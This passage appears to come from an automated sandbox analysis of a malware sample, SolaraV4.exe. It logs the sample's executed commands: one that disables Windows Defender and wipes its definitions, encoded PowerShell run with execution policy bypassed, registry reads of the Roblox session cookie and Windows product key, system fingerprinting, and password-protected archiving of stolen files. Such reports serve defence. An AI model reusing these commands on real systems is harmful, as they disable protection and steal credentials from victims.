MAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\myx0gned\myx0gned.cmdline"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6CAA.tmp" "c:\Users\user\AppData\Local\Temp\myx0gned\CSC193A8B703A1D4F08B0E861F82E42C2AF.TMP"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe a -r -hp"qwerty123" "C:\Users\user\AppData\Local\Temp\6zHpy.zip" *
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all" Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe Code function: 108_2_00007FF7C722B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 108_2_00007FF7C722B340
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\SolaraV4.exe Code function: 1_2_00007FF6FFC79570 cpuid 1_2_00007FF6FFC79570
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SolaraV4.exe Queries volume information: C:\Users\user\Desktop\SolaraV4.exe VolumeInformation Jump to behavior
